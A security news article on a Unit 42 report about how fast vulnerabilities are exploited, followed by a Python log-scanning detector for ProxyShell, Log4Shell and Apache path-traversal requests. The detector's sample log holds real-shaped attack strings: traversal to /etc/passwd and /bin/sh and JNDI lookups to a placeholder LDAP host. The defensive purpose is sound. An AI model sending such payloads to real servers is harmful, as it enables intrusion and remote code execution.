Malicious actors are increasingly quick to exploit high-profile zero-day vulnerabilities, with scanning for a new CVE starting within 15 minutes of its public disclosure, a new report from Palo Alto Networks' Unit 42 has revealed.
Based on data collected from more than 600 incident response cases, the researchers concluded that software vulnerabilities remain one of the top initial access vectors for threat actors (31% of the analyzed cases), second only to phishing at 37%. Other access vectors include brute-force credential attacks (9%), previously compromised credentials (6%), insider threat and social engineering (5%), and abuse of trusted relationships/tools (4%).
The report says that the most exploited vulnerabilities for network access in H1 2022 were the three ProxyShell vulnerabilities (55%), Log4j (14%), SonicWall CVEs (7%), ProxyLogon (5%), Zoho ManageEngine ADSelfService Plus (4%), and Fortinet CVEs (3%).
“While some threat actors continue to rely on older, unpatched vulnerabilities, we’re increasingly seeing that the time from vulnerability to exploit is getting shorter. In fact, it can practically coincide with the reveal if the vulnerabilities themselves and the access that can be achieved by exploiting them are significant enough,” the researchers wrote in a blog post.
Additionally, end-of-life (EoL) systems remain unpatchable and available to an opportunistic attacker for exploitation, they noted. According to the report, nearly 32% of exposed organizations are running an EoL version of Apache HTTP Server, leaving them open to the path traversal flaws CVE-2021-41773 (introduced in 2.4.49) and CVE-2021-42013 (the incomplete fix shipped in 2.4.50, corrected in 2.4.51), which can be escalated to remote code execution on servers with CGI enabled.
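Because the report's top vectors (ProxyShell, Log4j, and the Apache traversal bugs above) are all reachable over HTTP, the scanning it describes leaves traces in ordinary web server access logs. The following is an added example, not code from the report or from Unit 42, showing how a defender can sweep such logs for the well-known request signatures of those three bug classes. The access-log lines are constructed for this illustration (RFC 5737 documentation addresses, made-up timestamps), and the matching rules are deliberately simple: they decode URL encoding repeatedly so that the double-encoded `%%32%65` form used against CVE-2021-42013 normalizes to `..` just like the single-encoded `%2e` form used against CVE-2021-41773, they collapse the `${lower:j}`-style lookups used to obfuscate Log4Shell payloads, and they look for the `autodiscover.json?@` path confusion characteristic of ProxyShell.

```python
import re
from urllib.parse import unquote

# Constructed sample access log in Apache combined-log style (not real data).
SAMPLE_LOG = """\
203.0.113.10 - - [05/Oct/2021:14:02:11 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1420
203.0.113.10 - - [07/Oct/2021:09:15:42 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 61
198.51.100.7 - - [10/Dec/2021:22:41:03 +0000] "GET /login?user=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 200 512
198.51.100.7 - - [10/Dec/2021:22:41:05 +0000] "GET /?x=${${lower:j}ndi:ldap://198.51.100.7:1389/b} HTTP/1.1" 200 512
198.51.100.7 - - [10/Dec/2021:22:41:09 +0000] "GET / HTTP/1.1" 200 512
192.0.2.55 - - [12/Aug/2021:03:30:17 +0000] "GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 200 3012
192.0.2.55 - - [12/Aug/2021:03:31:00 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 200 3012
"""

# Source IP, timestamp, method and request URI from a combined-log line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# "/../" anywhere in the decoded path, i.e. a segment that climbs out of DocumentRoot.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')
# Log4Shell lookup after obfuscating wrappers have been stripped.
JNDI_RE = re.compile(r'\$\{\s*jndi:', re.I)
# Nested ${lower:x} / ${upper:x} lookups used to split the "jndi" keyword.
CASE_WRAPPER_RE = re.compile(r'\$\{(?:lower|upper):([^}]*)\}', re.I)
# ProxyShell path-confusion prefix on the Exchange Autodiscover endpoint.
PROXYSHELL_RE = re.compile(r'autodiscover\.json\?@', re.I)


def decode_url(s: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so that
    double-encoded sequences such as %%32%65 collapse to a literal '.'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def is_apache_traversal(decoded_uri: str) -> bool:
    # CVE-2021-41773 / CVE-2021-42013 probes look like /cgi-bin/../../etc/passwd after decoding.
    path = decoded_uri.split('?', 1)[0]
    return bool(TRAVERSAL_RE.search(path))


def is_log4shell(decoded_uri: str) -> bool:
    # Unwrap ${lower:j}ndi -> jndi before looking for the lookup itself.
    normalized = CASE_WRAPPER_RE.sub(r'\1', decoded_uri)
    return bool(JNDI_RE.search(normalized))


def is_proxyshell(decoded_uri: str) -> bool:
    return bool(PROXYSHELL_RE.search(decoded_uri))


# Rule name -> predicate over the decoded request URI.
RULES = {
    "apache-path-traversal": is_apache_traversal,
    "log4shell": is_log4shell,
    "proxyshell": is_proxyshell,
}


def detect(log_text: str) -> list:
    """Return one hit per (line, rule) for every log line that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production detector would count these
        decoded = decode_url(m.group("uri"))
        for rule, predicate in RULES.items():
            if predicate(decoded):
                hits.append({
                    "src": m.group("src"),
                    "ts": m.group("ts"),
                    "rule": rule,
                    "request": m.group("uri"),
                    "decoded": decoded,
                })
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']:<14} {hit['rule']:<22} {hit['decoded']}")
```

Decoding before matching is the part worth keeping even if the rules change: the two Apache CVEs differ precisely in how many layers of encoding the server strips, so a detector that matches on the raw URI catches the first bug and misses the second. The per-rule predicates are intentionally narrow signatures for the request shapes named in the report, not a general-purpose WAF, and in practice they would be joined by a status-code filter (a 200 on `/etc/passwd` is far more interesting than a 404) and by grouping hits per source address to see how quickly a scanner moves from probe to follow-up request.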